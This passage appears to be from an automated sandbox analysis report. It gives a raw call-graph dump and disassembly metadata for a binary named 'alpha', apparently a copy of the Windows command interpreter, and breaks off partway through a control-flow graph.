7ff7d15226e0 19 API calls 22212->22220 22223 7ff7d151b356 22212->22223 22248 7ff7d152c1a5 22212->22248 22551 7ff7d153f318 _get_osfhandle GetFileType 22212->22551 22215 7ff7d152c1f9 22213->22215 22214->22217 22221 7ff7d15209f4 2 API calls 22214->22221 22218 7ff7d151af98 2 API calls 22215->22218 22216->22212 22222 7ff7d151af98 2 API calls 22217->22222 22218->22191 22219 7ff7d151b038 _dup2 22224 7ff7d152c1b7 22219->22224 22220->22212 22225 7ff7d152c084 22221->22225 22226 7ff7d152c24b 22222->22226 22232 7ff7d151af98 2 API calls 22223->22232 22227 7ff7d152c207 22224->22227 22228 7ff7d152c1be 22224->22228 22229 7ff7d151b900 166 API calls 22225->22229 22230 7ff7d153f1d8 166 API calls 22226->22230 22231 7ff7d151d208 _close 22227->22231 22233 7ff7d151d208 _close 22228->22233 22234 7ff7d152c08c 22229->22234 22230->22191 22231->22223 22235 7ff7d152c211 22232->22235 22233->22209 22236 7ff7d152c094 wcsrchr 22234->22236 22246 7ff7d152c0ad 22234->22246 22237 7ff7d15233f0 _vsnwprintf 22235->22237 22236->22246 22238 7ff7d152c22c 22237->22238 22239 7ff7d1513278 166 API calls 22238->22239 22239->22191 22240 7ff7d152c106 22242 7ff7d151ff70 2 API calls 22240->22242 22241 7ff7d152c0e0 _wcsnicmp 22241->22246 22243 7ff7d152c13b 22242->22243 22243->22217 22244 7ff7d152c146 SearchPathW 22243->22244 22244->22217 22245 7ff7d152c188 22244->22245 22247 7ff7d15226e0 19 API calls 22245->22247 22246->22240 22246->22241 22247->22248 22248->22219 22250 7ff7d1517211 _setjmp 22249->22250 22254 7ff7d1517279 22249->22254 22252 7ff7d1517265 22250->22252 22250->22254 22552 7ff7d15172b0 22252->22552 22254->22064 22256 7ff7d151cb63 22255->22256 22257 7ff7d151cd90 166 API calls 22256->22257 22258 7ff7d151c848 22257->22258 22258->22108 22259 7ff7d151cad4 22258->22259 22260 7ff7d151cad9 22259->22260 22268 7ff7d151cb05 22259->22268 22261 7ff7d151cd90 166 API calls 22260->22261 22260->22268 22262 7ff7d152c722 22261->22262 22263 7ff7d152c72e GetConsoleTitleW 22262->22263 22262->22268 22264 7ff7d152c74a 22263->22264 22263->22268 22265 7ff7d151b6b0 170 API calls 22264->22265 22270 7ff7d152c778 22265->22270 22266 7ff7d152c7ec 22267 7ff7d151ff70 2 API calls 22266->22267 22267->22268 22268->22108 22269 7ff7d152c7dd SetConsoleTitleW 22269->22266 22270->22266 22270->22269 22272 7ff7d15242ab UpdateProcThreadAttribute 22271->22272 22273 7ff7d152ecd4 GetLastError 22271->22273 22274 7ff7d15242eb memset memset GetStartupInfoW 22272->22274 22275 7ff7d152ecf0 GetLastError 22272->22275 22276 7ff7d152ecee 22273->22276 22278 7ff7d1523a90 170 API calls 22274->22278 22368 7ff7d1539eec 22275->22368 22280 7ff7d15243a8 22278->22280 22281 7ff7d151b900 166 API calls 22280->22281 22282 7ff7d15243bb 22281->22282 22283 7ff7d1524638 _local_unwind 22282->22283 22284 7ff7d15243cc 22282->22284 22283->22284 22285 7ff7d15243de wcsrchr 22284->22285 22286 7ff7d1524415 22284->22286 22285->22286 22287 7ff7d15243f7 lstrcmpW 22285->22287 22355 7ff7d1525a68 _get_osfhandle SetConsoleMode _get_osfhandle SetConsoleMode 22286->22355 22287->22286 22290 7ff7d1524668 22287->22290 22289 7ff7d152441a 22291 7ff7d152442a CreateProcessW 22289->22291 22294 7ff7d1524596 CreateProcessAsUserW 22289->22294 22356 7ff7d1539044 22290->22356 22293 7ff7d152448b 22291->22293 22295 7ff7d1524672 GetLastError 22293->22295 22296 7ff7d1524495 CloseHandle 22293->22296 22294->22293 22303 7ff7d152468d 22295->22303 22297 7ff7d152498c 8 API calls 22296->22297 22298 7ff7d15244c5 22297->22298 22302 7ff7d15244cd 22298->22302 22298->22303 22299 7ff7d15247a3 22299->22147 22300 7ff7d15244f8 22300->22299 22305 7ff7d1525cb4 7 API calls 22300->22305 22327 7ff7d1524612 22300->22327 22301 7ff7d151cd90 166 API calls 22304 7ff7d1524724 22301->22304 22302->22299 22302->22300 22317 7ff7d153a250 33 API calls 22302->22317 22303->22301 22303->22302 22307 7ff7d152472c _local_unwind 22304->22307 22314 7ff7d152473d 22304->22314 22309 7ff7d1524517 22305->22309 22306 7ff7d152461c 22310 7ff7d151ff70 GetProcessHeap RtlFreeHeap 22306->22310 22307->22314 22308 7ff7d15247e1 CloseHandle 22308->22306 22311 7ff7d15233f0 _vsnwprintf 22309->22311 22312 7ff7d15247fa DeleteProcThreadAttributeList 22310->22312 22313 7ff7d1524544 22311->22313 22315 7ff7d1528f80 7 API calls 22312->22315 22316 7ff7d152498c 8 API calls 22313->22316 22322 7ff7d151ff70 GetProcessHeap RtlFreeHeap 22314->22322 22318 7ff7d1524820 22315->22318 22319 7ff7d1524558 22316->22319 22317->22300 22318->22147 22320 7ff7d15247ae 22319->22320 22321 7ff7d1524564 22319->22321 22324 7ff7d15233f0 _vsnwprintf 22320->22324 22323 7ff7d152498c 8 API calls 22321->22323 22325 7ff7d152475b _local_unwind 22322->22325 22326 7ff7d1524577 22323->22326 22324->22327 22325->22302 22326->22306 22328 7ff7d152457f 22326->22328 22327->22306 22327->22308 22329 7ff7d153a920 210 API calls 22328->22329 22330 7ff7d1524584 22329->22330 22330->22306 22344 7ff7d1519737 22331->22344 22333 7ff7d151cd90 166 API calls 22333->22344 22334 7ff7d151977d memset 22335 7ff7d151ca40 17 API calls 22334->22335 22335->22344 22336 7ff7d152b76e 22338 7ff7d1513278 166 API calls 22336->22338 22337 7ff7d152b7b3 22340 7ff7d152b787 22338->22340 22339 7ff7d152b79a 22342 7ff7d152855c ??_V@YAXPEAX 22339->22342 22343 7ff7d152b795 22340->22343 22345 7ff7d153e944 393 API calls 22340->22345 22341 7ff7d151b364 17 API calls 22341->22344 22342->22337 22453 7ff7d1537694 22343->22453 22344->22333 22344->22334 22344->22336 22344->22337 22344->22339 22344->22341 22349 7ff7d15196b4 186 API calls 22344->22349 22350 7ff7d151986d 22344->22350 22370 7ff7d1521fac memset 22344->22370 22397 7ff7d151ce10 22344->22397 22447 7ff7d1525920 22344->22447 22345->22343 22349->22344 22351 7ff7d151988c 22350->22351 22352 7ff7d1519880 ??_V@YAXPEAX 22350->22352 22353 7ff7d1528f80 7 API calls 22351->22353 22352->22351 22354 7ff7d151989d 22353->22354 22354->22147 22357 7ff7d1523a90 170 API calls 22356->22357 22358 7ff7d1539064 22357->22358 22359 7ff7d153906e 22358->22359 22360 7ff7d1539083 22358->22360 22361 7ff7d152498c 8 API calls 22359->22361 22363 7ff7d151cd90 166 API calls 22360->22363 22362 7ff7d1539081 22361->22362 22362->22286 22364 7ff7d153909b 22363->22364 22364->22362 22365 7ff7d152498c 8 API calls 22364->22365 22366 7ff7d15390ec 22365->22366 22367 7ff7d151ff70 2 API calls 22366->22367 22367->22362 22369 7ff7d152ed0a DeleteProcThreadAttributeList 22368->22369 22369->22276 22371 7ff7d152203b 22370->22371 22372 7ff7d15220b0 22371->22372 22373 7ff7d1522094 22371->22373 22374 7ff7d1523060 171 API calls 22372->22374 22376 7ff7d152211c 22372->22376 22375 7ff7d15220a6 22373->22375 22377 7ff7d1513278 166 API calls 22373->22377 22374->22376 22378 7ff7d1528f80 7 API calls 22375->22378 22376->22375 22379 7ff7d1522e44 2 API calls 22376->22379 22377->22375 22380 7ff7d1522325 22378->22380 22381 7ff7d1522148 22379->22381 22380->22344 22381->22375 22382 7ff7d1522d70 3 API calls 22381->22382 22383 7ff7d15221af 22382->22383 22384 7ff7d151b900 166 API calls 22383->22384 22386 7ff7d15221d0 22384->22386 22385 7ff7d152e04a ??_V@YAXPEAX 22385->22375 22386->22385 22387 7ff7d152221c wcsspn 22386->22387 22396 7ff7d15222a4 ??_V@YAXPEAX 22386->22396 22389 7ff7d151b900 166 API calls 22387->22389 22390 7ff7d152223b 22389->22390 22390->22385 22394 7ff7d1522252 22390->22394 22391 7ff7d152228f 22392 7ff7d151d3f0 223 API calls 22391->22392 22392->22396 22393 7ff7d152e06d wcschr 22393->22394 22394->22391 22394->22393 22395 7ff7d152e090 towupper 22394->22395 22395->22391 22395->22394 22396->22375 22398 7ff7d151d0f8 22397->22398 22417 7ff7d151ce5b 22397->22417 22399 7ff7d1528f80 7 API calls 22398->22399 22402 7ff7d151d10a 22399->22402 22400 7ff7d152c860 22401 7ff7d152c97c 22400->22401 22404 7ff7d153ee88 390 API calls 22400->22404 22405 7ff7d153e9b4 197 API calls 22401->22405 22402->22344 22403 7ff7d1520494 182 API calls 22403->22417 22406 7ff7d152c879 22404->22406 22407 7ff7d152c981 longjmp 22405->22407 22408 7ff7d152c95c 22406->22408 22409 7ff7d152c882 EnterCriticalSection LeaveCriticalSection 22406->22409 22410 7ff7d152c99a 22407->22410 22408->22401 22413 7ff7d15196b4 186 API calls 22408->22413 22423 7ff7d151d0e3 22409->22423 22410->22398 22412 7ff7d152c9b3 ??_V@YAXPEAX 22410->22412 22412->22398 22413->22408 22414 7ff7d151ceaa _tell 22415 7ff7d151d208 _close 22414->22415 22415->22417 22416 7ff7d151cd90 166 API calls 22416->22417 22417->22398 22417->22400 22417->22403 22417->22410 22417->22416 22418 7ff7d152c9d5 22417->22418 22420 7ff7d151b900 166 API calls 22417->22420 22417->22423 22427 7ff7d151cf33 memset 22417->22427 22430 7ff7d151ca40 17 API calls 22417->22430 22431 7ff7d151d184 wcschr 22417->22431 22432 7ff7d153bfec 176 API calls 22417->22432 22433 7ff7d152c9c9 22417->22433 22434 7ff7d151d1a7 wcschr 22417->22434 22436 7ff7d153778c 166 API calls 22417->22436 22437 7ff7d151be00 635 API calls 22417->22437 22438 7ff7d1520a6c 273 API calls 22417->22438 22439 7ff7d1523448 166 API calls 22417->22439 22440 7ff7d1520580 12 API calls 22417->22440 22441 7ff7d151cfab _wcsicmp 22417->22441 22445 7ff7d1521fac 238 API calls 22417->22445 22446 7ff7d151d044 ??_V@YAXPEAX 22417->22446 22459 7ff7d151df60 22417->22459 22479 7ff7d153c738 22417->22479 22419 7ff7d153d610 167 API calls 22418->22419 22422 7ff7d152c9da 22419->22422 22420->22417 22421 7ff7d152ca07 22424 7ff7d153e91c 198 API calls 22421->22424 22422->22421 22425 7ff7d153bfec 176 API calls 22422->22425 22423->22344 22429 7ff7d152ca0c 22424->22429 22426 7ff7d152c9f1 22425->22426 22428 7ff7d1513240 166 API calls 22426->22428 22427->22417 22428->22421 22429->22344 22430->22417 22431->22417 22432->22417 22435 7ff7d152855c ??_V@YAXPEAX 22433->22435 22434->22417 22435->22398 22436->22417 22437->22417 22438->22417 22439->22417 22442 7ff7d151d003 GetConsoleOutputCP GetCPInfo 22440->22442 22441->22417 22443 7ff7d15204f4 3 API calls 22442->22443 22443->22417 22445->22417 22446->22417 22448 7ff7d152596c 22447->22448 22452 7ff7d1525a12 22447->22452 22449 7ff7d152598d VirtualQuery 22448->22449 22448->22452 22450 7ff7d15259ad 22449->22450 22449->22452 22451 7ff7d15259b7 VirtualQuery 22450->22451 22450->22452 22451->22450 22451->22452 22452->22344 22454 7ff7d15376a3 22453->22454 22455 7ff7d15376b7 22454->22455 22457 7ff7d15196b4 186 API calls 22454->22457 22456 7ff7d153e9b4 197 API calls 22455->22456 22458 7ff7d15376bc longjmp 22456->22458 22457->22454 22460 7ff7d151dfe2 22459->22460 22461 7ff7d151df93 22459->22461 22463 7ff7d151e100 VirtualFree 22460->22463 22464 7ff7d151e00b _setjmp 22460->22464 22461->22460 22462 7ff7d151df9f GetProcessHeap RtlFreeHeap 22461->22462 22462->22460 22462->22461 22463->22460 22465 7ff7d151e04a 22464->22465 22466 7ff7d151e0c3 22464->22466 22467 7ff7d151e600 473 API calls 22465->22467 22466->22414 22468 7ff7d151e073 22467->22468 22469 7ff7d151e0e0 longjmp 22468->22469 22470 7ff7d151e081 22468->22470 22471 7ff7d151e0b0 22469->22471 22472 7ff7d151d250 475 API calls 22470->22472 22471->22466 22489 7ff7d153d3fc 22471->22489 22473 7ff7d151e086 22472->22473 22473->22471 22476 7ff7d151e600 473 API calls 22473->22476 22477 7ff7d151e0a7 22476->22477 22477->22471 22478 7ff7d153d610 167 API calls 22477->22478 22478->22471 22480 7ff7d153c775 22479->22480 22484 7ff7d153c7ab 22479->22484 22481 7ff7d151cd90 166 API calls 22480->22481 22483 7ff7d153c781 22481->22483 22482 7ff7d153c8d4 22482->22417 22483->22482 22485 7ff7d151b0d8 194 API calls 22483->22485 22484->22482 22484->22483 22486 7ff7d151b6b0 170 API calls 22484->22486 22487 7ff7d151b038 _dup2 22484->22487 22488 7ff7d151d208 _close 22484->22488 22485->22482 22486->22484 22487->22484 22488->22484 22506 7ff7d153d419 22489->22506 22490 7ff7d152cadf 22491 7ff7d1523448 166 API calls 22491->22506 22492 7ff7d153d592 22494 7ff7d1523448 166 API calls 22492->22494 22493 7ff7d153d5c4 22495 7ff7d1523448 166 API calls 22493->22495 22497 7ff7d153d5a5 22494->22497 22495->22490 22498 7ff7d153d5ba 22497->22498 22500 7ff7d1523448 166 API calls 22497->22500 22507 7ff7d153d36c 22498->22507 22499 7ff7d153d546 22499->22493 22502 7ff7d153d555 22499->22502 22500->22498 22514 7ff7d153d31c 22502->22514 22503 7ff7d153d541 22503->22492 22503->22493 22503->22499 22505 7ff7d153d589 22503->22505 22504 7ff7d153d3fc 166 API calls 22504->22506 22505->22492 22505->22502 22506->22490 22506->22491 22506->22492 22506->22493 22506->22502 22506->22503 22506->22504 22508 7ff7d153d3d8 22507->22508 22509 7ff7d153d381 22507->22509 22510 7ff7d15234a0 166 API calls 22509->22510 22513 7ff7d153d390 22510->22513 22511 7ff7d1523448 166 API calls 22511->22513 22512 7ff7d15234a0 166 API calls 22512->22513 22513->22508 22513->22511 22513->22512 22515 7ff7d1523448 166 API calls 22514->22515 22516 7ff7d153d33b 22515->22516 22517 7ff7d153d36c 166 API calls 22516->22517 22518 7ff7d153d343 22517->22518 22519 7ff7d153d3fc 166 API calls 22518->22519 22524 7ff7d153d34e 22519->22524 22520 7ff7d153d5c2 22520->22490 22521 7ff7d153d592 22523 7ff7d1523448 166 API calls 22521->22523 22522 7ff7d153d5c4 22525 7ff7d1523448 166 API calls 22522->22525 22527 7ff7d153d5a5 22523->22527 22524->22520 22524->22521 22524->22522 22529 7ff7d1523448 166 API calls 22524->22529 22532 7ff7d153d555 22524->22532 22533 7ff7d153d541 22524->22533 22536 7ff7d153d3fc 166 API calls 22524->22536 22525->22520 22526 7ff7d153d31c 166 API calls 22526->22520 22528 7ff7d153d5ba 22527->22528 22530 7ff7d1523448 166 API calls 22527->22530 22531 7ff7d153d36c 166 API calls 22528->22531 22529->22524 22530->22528 22531->22520 22532->22526 22533->22521 22533->22522 22534 7ff7d153d546 22533->22534 22535 7ff7d153d589 22533->22535 22534->22522 22534->22532 22535->22521 22535->22532 22536->22524 22538 7ff7d151c4c9 22537->22538 22539 7ff7d151c486 22537->22539 22542 7ff7d151ff70 2 API calls 22538->22542 22544 7ff7d151c161 22538->22544 22540 7ff7d151c48e wcschr 22539->22540 22539->22544 22541 7ff7d151c4ef 22540->22541 22540->22544 22543 7ff7d151cd90 166 API calls 22541->22543 22542->22544 22545 7ff7d151c4f9 22543->22545 22544->22176 22544->22177 22545->22544 22546 7ff7d151d840 178 API calls 22545->22546 22549 7ff7d151c5bd 22545->22549 22550 7ff7d151c541 22545->22550 22546->22545 22547 7ff7d151ff70 2 API calls 22547->22544 22548 7ff7d151b6b0 170 API calls 22548->22550 22549->22548 22549->22550 22550->22544 22550->22547 22551->22212 22553 7ff7d15172de 22552->22553 22554 7ff7d1534621 22552->22554 22556 7ff7d15172eb 22553->22556 22560 7ff7d1534467 22553->22560 22561 7ff7d1534530 22553->22561 22555 7ff7d15347e0 22554->22555 22557 7ff7d153447b longjmp 22554->22557 22562 7ff7d1534639 22554->22562 22569 7ff7d153475e 22554->22569 22558 7ff7d1517348 168 API calls 22555->22558 22613 7ff7d1517348 22556->22613 22563 7ff7d1534492 22557->22563 22612 7ff7d1534524 22558->22612 22560->22556 22560->22563 22572 7ff7d1534475 22560->22572 22568 7ff7d1517348 168 API calls 22561->22568 22565 7ff7d153463e 22562->22565 22566 7ff7d1534695 22562->22566 22567 7ff7d1517348 168 API calls 22563->22567 22565->22557 22585 7ff7d1534654 22565->22585 22571 7ff7d15173d4 168 API calls 22566->22571 22574 7ff7d15344a8 22567->22574 22575 7ff7d1534549 22568->22575 22573 7ff7d1517348 168 API calls 22569->22573 22570 7ff7d1517315 22628 7ff7d15173d4 22570->22628 22599 7ff7d153469a 22571->22599 22572->22557 22572->22566 22573->22555 22586 7ff7d15344e2 22574->22586 22591 7ff7d1517348 168 API calls 22574->22591 22579 7ff7d15345b2 22575->22579 22587 7ff7d153455e 22575->22587 22598 7ff7d1517348 168 API calls 22575->22598 22576 7ff7d15172b0 168 API calls 22580 7ff7d153480e 22576->22580 22577 7ff7d1517348 168 API calls 22577->22570 22581 7ff7d1517348 168 API calls 22579->22581 22580->22254 22584 7ff7d15345c7 22581->22584 22582 7ff7d15172b0 168 API calls 22593 7ff7d1534738 22582->22593 22583 7ff7d15346e1 22583->22582 22590 7ff7d1517348 168 API calls 22584->22590 22588 7ff7d1517348 168 API calls 22585->22588 22592 7ff7d15172b0 168 API calls 22586->22592 22587->22579 22589 7ff7d1517348 168 API calls 22587->22589 22594 7ff7d1517323 22588->22594 22589->22579 22597 7ff7d15345db 22590->22597 22591->22586 22595 7ff7d15344f1 22592->22595 22596 7ff7d1517348 168 API calls 22593->22596 22594->22254 22601 7ff7d15172b0 168 API calls 22595->22601 22596->22612 22600 7ff7d1517348 168 API calls 22597->22600 22598->22587 22599->22583 22603 7ff7d15346ea 22599->22603 22604 7ff7d15346c7 22599->22604 22605 7ff7d15345ec 22600->22605 22602 7ff7d1534503 22601->22602 22602->22594 22608 7ff7d1517348 168 API calls 22602->22608 22606 7ff7d1517348 168 API calls 22603->22606 22604->22583 22609 7ff7d1517348 168 API calls 22604->22609 22607 7ff7d1517348 168 API calls 22605->22607 22606->22583 22610 7ff7d1534600 22607->22610 22608->22612 22609->22583 22611 7ff7d1517348 168 API calls 22610->22611 22611->22612 22612->22576 22612->22594 22620 7ff7d151735d 22613->22620 22614 7ff7d1513278 166 API calls 22615 7ff7d1534820 longjmp 22614->22615 22616 7ff7d1534838 22615->22616 22617 7ff7d1513278 166 API calls 22616->22617 22618 7ff7d1534844 longjmp 22617->22618 22619 7ff7d153485a 22618->22619 22621 7ff7d1517348 166 API calls 22619->22621 22620->22614 22620->22616 22620->22620 22627 7ff7d15173ab 22620->22627 22622 7ff7d153487b 22621->22622 22623 7ff7d1517348 166 API calls 22622->22623 22624 7ff7d15348ad 22623->22624 22625 7ff7d1517348 166 API calls 22624->22625 22626 7ff7d15172ff 22625->22626 22626->22570 22626->22577 22629 7ff7d1517401 22628->22629 22629->22594 22630 7ff7d1517348 168 API calls 22629->22630 22631 7ff7d153487b 22630->22631 22632 7ff7d1517348 168 API calls 22631->22632 22633 7ff7d15348ad 22632->22633 22634 7ff7d1517348 168 API calls 22633->22634 22635 7ff7d15348be 22634->22635 22635->22594

                                                                                                                                                                                                                                                                                                                                                                                                                                        Executed Functions

                                                                                                                                                                                                                                                                                                                                                                                                                                        Function 00007FF7D1520A6C Relevance: 53.1, APIs: 23, Strings: 7, Instructions: 605COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000004.00000002.1265032008.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265007653.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265076724.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265193351.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: _wcsicmpwcschrwcsrchr$CurrentDirectoryNeedPath_wcsnicmpmemset
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID: .BAT$.CMD$.COM;.EXE;.BAT;.CMD;.VBS;.JS;.WS;.MSC$COMSPEC$PATH$PATHEXT$cmd
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 3305344409-4288247545
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: a96582028ec0f2fe5c172ab386b274325035dd19617a6b7700d430aa1b709d90
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: 26f6fce0b16e7127b0682493bc88e9228820a00b601e91ffb9aa57b5547d5f30
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a96582028ec0f2fe5c172ab386b274325035dd19617a6b7700d430aa1b709d90
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0042D662A0968B85FB50AB1198502BEE7A1EF85794FD44272DD1F877F5DFBCE0448320
                                                                                                                                                                                                                                                                                                                                                                                                                                        Function 00007FF7D151AA54 Relevance: 51.3, APIs: 24, Strings: 5, Instructions: 536COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                                                                                                                                                                                                        control_flow_graph 216 7ff7d151aa54-7ff7d151aa98 call 7ff7d151cd90 219 7ff7d152bf5a-7ff7d152bf70 call 7ff7d1524c1c call 7ff7d151ff70 216->219 220 7ff7d151aa9e 216->220 222 7ff7d151aaa5-7ff7d151aaa8 220->222 224 7ff7d151acde-7ff7d151ad00 222->224 225 7ff7d151aaae-7ff7d151aac8 wcschr 222->225 229 7ff7d151ad06 224->229 225->224 227 7ff7d151aace-7ff7d151aae9 towlower 225->227 227->224 228 7ff7d151aaef-7ff7d151aaf3 227->228 231 7ff7d152beb7-7ff7d152bec4 call 7ff7d153eaf0 228->231 232 7ff7d151aaf9-7ff7d151aafd 228->232 233 7ff7d151ad0d-7ff7d151ad1f 229->233 246 7ff7d152bec6-7ff7d152bed8 call 7ff7d1513240 231->246 247 7ff7d152bf43-7ff7d152bf59 call 7ff7d1524c1c 231->247 235 7ff7d152bbcf 232->235 236 7ff7d151ab03-7ff7d151ab07 232->236 237 7ff7d151ad22-7ff7d151ad2a call 7ff7d15213e0 233->237 249 7ff7d152bbde 235->249 239 7ff7d151ab09-7ff7d151ab0d 236->239 240 7ff7d151ab7d-7ff7d151ab81 236->240 237->222 243 7ff7d151ab13-7ff7d151ab17 239->243 244 7ff7d152be63 239->244 240->244 248 7ff7d151ab87-7ff7d151ab95 240->248 243->240 251 7ff7d151ab19-7ff7d151ab1d 243->251 257 7ff7d152be72-7ff7d152be88 call 7ff7d1513278 call 7ff7d1524c1c 244->257 246->247 263 7ff7d152beda-7ff7d152bee9 call 7ff7d1513240 246->263 247->219 250 7ff7d151ab98-7ff7d151aba0 248->250 255 7ff7d152bbea-7ff7d152bbec 249->255 250->250 254 7ff7d151aba2-7ff7d151abb3 call 7ff7d151cd90 250->254 251->249 256 7ff7d151ab23-7ff7d151ab27 251->256 254->219 269 7ff7d151abb9-7ff7d151abde call 7ff7d15213e0 call 7ff7d15233a8 254->269 265 7ff7d152bbf8-7ff7d152bc01 255->265 256->255 261 7ff7d151ab2d-7ff7d151ab31 256->261 284 7ff7d152be89-7ff7d152be8c 257->284 261->229 266 7ff7d151ab37-7ff7d151ab3b 261->266 277 7ff7d152beeb-7ff7d152bef1 263->277 278 7ff7d152bef3-7ff7d152bef9 263->278 265->233 266->265 270 7ff7d151ab41-7ff7d151ab45 266->270 307 7ff7d151abe4-7ff7d151abe7 269->307 308 7ff7d151ac75 269->308 274 7ff7d151ab4b-7ff7d151ab4f 270->274 275 7ff7d152bc06-7ff7d152bc2a call 7ff7d15213e0 270->275 282 7ff7d151ad2f-7ff7d151ad33 274->282 283 7ff7d151ab55-7ff7d151ab78 call 7ff7d15213e0 274->283 294 7ff7d152bc5a-7ff7d152bc61 275->294 295 7ff7d152bc2c-7ff7d152bc4c _wcsnicmp 275->295 277->247 277->278 278->247 279 7ff7d152befb-7ff7d152bf0d call 7ff7d1513240 278->279 279->247 305 7ff7d152bf0f-7ff7d152bf21 call 7ff7d1513240 279->305 288 7ff7d151ad39-7ff7d151ad3d 282->288 289 7ff7d152bc66-7ff7d152bc8a call 7ff7d15213e0 282->289 283->222 291 7ff7d151acbe 284->291 292 7ff7d152be92-7ff7d152beaa call 7ff7d1513278 call 7ff7d1524c1c 284->292 297 7ff7d152bcde-7ff7d152bd02 call 7ff7d15213e0 288->297 298 7ff7d151ad43-7ff7d151ad49 288->298 325 7ff7d152bc8c-7ff7d152bcaa _wcsnicmp 289->325 326 7ff7d152bcc4-7ff7d152bcdc 289->326 301 7ff7d151acc0-7ff7d151acc7 291->301 337 7ff7d152beab-7ff7d152beb6 call 7ff7d1524c1c 292->337 311 7ff7d152bd31-7ff7d152bd4f _wcsnicmp 294->311 295->294 306 7ff7d152bc4e-7ff7d152bc55 295->306 331 7ff7d152bd2a 297->331 332 7ff7d152bd04-7ff7d152bd24 _wcsnicmp 297->332 309 7ff7d152bd5e-7ff7d152bd65 298->309 310 7ff7d151ad4f-7ff7d151ad68 298->310 301->301 313 7ff7d151acc9-7ff7d151acda 301->313 305->247 339 7ff7d152bf23-7ff7d152bf35 call 7ff7d1513240 305->339 320 7ff7d152bbb3-7ff7d152bbb7 306->320 307->291 322 7ff7d151abed-7ff7d151ac0b call 7ff7d151cd90 * 2 307->322 317 7ff7d151ac77-7ff7d151ac7f 308->317 309->310 321 7ff7d152bd6b-7ff7d152bd73 309->321 323 7ff7d151ad6a 310->323 324 7ff7d151ad6d-7ff7d151ad70 310->324 318 7ff7d152bbc2-7ff7d152bbca 311->318 319 7ff7d152bd55 311->319 313->224 317->291 328 7ff7d151ac81-7ff7d151ac85 317->328 318->222 319->309 333 7ff7d152bbba-7ff7d152bbbd call 7ff7d15213e0 320->333 334 7ff7d152bd79-7ff7d152bd8b iswxdigit 321->334 335 7ff7d152be4a-7ff7d152be5e 321->335 322->337 358 7ff7d151ac11-7ff7d151ac14 322->358 323->324 324->237 325->326 329 7ff7d152bcac-7ff7d152bcbf 325->329 326->311 340 7ff7d151ac88-7ff7d151ac8f 328->340 329->320 331->311 332->331 338 7ff7d152bbac 332->338 333->318 334->335 342 7ff7d152bd91-7ff7d152bda3 iswxdigit 334->342 335->333 337->231 338->320 339->247 354 7ff7d152bf37-7ff7d152bf3e call 7ff7d1513240 339->354 340->340 345 7ff7d151ac91-7ff7d151ac94 340->345 342->335 347 7ff7d152bda9-7ff7d152bdbb iswxdigit 342->347 345->291 351 7ff7d151ac96-7ff7d151acaa wcsrchr 345->351 347->335 352 7ff7d152bdc1-7ff7d152bdd7 iswdigit 347->352 351->291 355 7ff7d151acac-7ff7d151acb9 call 7ff7d1521300 351->355 356 7ff7d152bdd9-7ff7d152bddd 352->356 357 7ff7d152bddf-7ff7d152bdeb towlower 352->357 354->247 355->291 359 7ff7d152bdee-7ff7d152be0f iswdigit 356->359 357->359 358->337 360 7ff7d151ac1a-7ff7d151ac33 memset 358->360 363 7ff7d152be17-7ff7d152be23 towlower 359->363 364 7ff7d152be11-7ff7d152be15 359->364 360->308 365 7ff7d151ac35-7ff7d151ac4b wcschr 360->365 366 7ff7d152be26-7ff7d152be45 call 7ff7d15213e0 363->366 364->366 365->308 367 7ff7d151ac4d-7ff7d151ac54 365->367 366->335 368 7ff7d151ac5a-7ff7d151ac6f wcschr 367->368 369 7ff7d151ad72-7ff7d151ad91 wcschr 367->369 368->308 368->369 371 7ff7d151ad97-7ff7d151adac wcschr 369->371 372 7ff7d151af03-7ff7d151af07 369->372 371->372 373 7ff7d151adb2-7ff7d151adc7 wcschr 371->373 372->308 373->372 374 7ff7d151adcd-7ff7d151ade2 wcschr 373->374 374->372 375 7ff7d151ade8-7ff7d151adfd wcschr 374->375 375->372 376 7ff7d151ae03-7ff7d151ae18 wcschr 375->376 376->372 377 7ff7d151ae1e-7ff7d151ae21 376->377 378 7ff7d151ae24-7ff7d151ae27 377->378 378->372 379 7ff7d151ae2d-7ff7d151ae40 iswspace 378->379 380 7ff7d151ae4b-7ff7d151ae5e 379->380 381 7ff7d151ae42-7ff7d151ae49 379->381 382 